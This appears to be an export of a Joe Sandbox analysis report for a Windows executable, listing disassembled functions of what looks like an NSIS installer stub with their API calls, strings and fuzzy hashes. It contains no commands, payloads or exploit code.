Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
@, xrefs: 00404B90
M, xrefs: 00404B43
N, xrefs: 00404C06

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@%F, xrefs: 00404674
A, xrefs: 00404636
82D, xrefs: 004046DB
@rD, xrefs: 00404610

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
%s: failed opening file "%s", xrefs: 00406F0C
name, xrefs: 00406FBF

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile("%s"), xrefs: 00406DBC
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 00406A53
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 0040682C

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

